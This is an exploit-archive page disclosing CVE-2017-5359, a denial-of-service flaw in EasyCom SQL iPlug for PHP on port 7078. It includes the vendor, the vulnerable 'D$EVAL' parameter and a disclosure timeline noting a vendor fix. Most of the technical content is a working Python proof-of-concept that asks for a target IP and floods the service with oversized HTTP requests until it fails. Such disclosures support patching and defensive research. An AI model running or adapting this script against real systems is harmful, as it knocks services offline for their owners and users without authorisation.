Lucene search

K
zdtHyp3rlinx1337DAY-ID-27078
HistoryFeb 22, 2017 - 12:00 a.m.

EasyCom For PHP 4.0.0 - Denial of Service Exploit

2017-02-2200:00:00
hyp3rlinx
0day.today
18

EPSS

0.109

Percentile

95.1%

Exploit for windows platform in category dos / poc

[+] Credits: John Page AKA Hyp3rlinX    
[+] Website: hyp3rlinx.altervista.org
 
Vendor:
================
easycom-aura.com
 
 
 
Product:
===========
SQL iPlug
EasycomPHP_4.0029.iC8im2.exe
 
SQL iPlug provides System i applications real-time access to heterogeneous and external databases
(Oracle, SQL Server, MySQL, MS Access, Sybase, Progress) in a completely transparent manner and without requiring replication.
 
 
 
Vulnerability Type:
===================
Denial Of Service
 
 
 
CVE Reference:
==============
CVE-2017-5359
 
 
 
Security Issue:
================
SQL iPlug listens on port 7078 by default, it suffers from denial of service when sending overly long string via
HTTP requests fed to the "D$EVAL" parameter.
 
 
 
Exploit/POC:
============
 
import socket
 
print 'EasyCom SQL-IPLUG DOS 0day!'
print 'hyp3rlinx'
 
IP = raw_input("[IP]> ")
PORT = 7078 
payload="A"*43000
  
arr=[]
c=0
while 1:
    try:
        arr.append(socket.create_connection((IP,PORT)))
        arr[c].send('GET /?D$EVAL='+payload+" HTTP/1.1\r\n\r\n")
        c+=1
        print "doit!"
    except socket.error:
        print "[*] 5th ave 12:00"
        raw_input()
        break
 
 
 
 
Disclosure Timeline:
======================================
Vendor Notification: December 22, 2016
Vendor acknowledgement: December 23, 2016
Vendor Release Fix/Version February 20, 2017
February 22, 2017 : Public Disclosure

#  0day.today [2018-04-12]  #

EPSS

0.109

Percentile

95.1%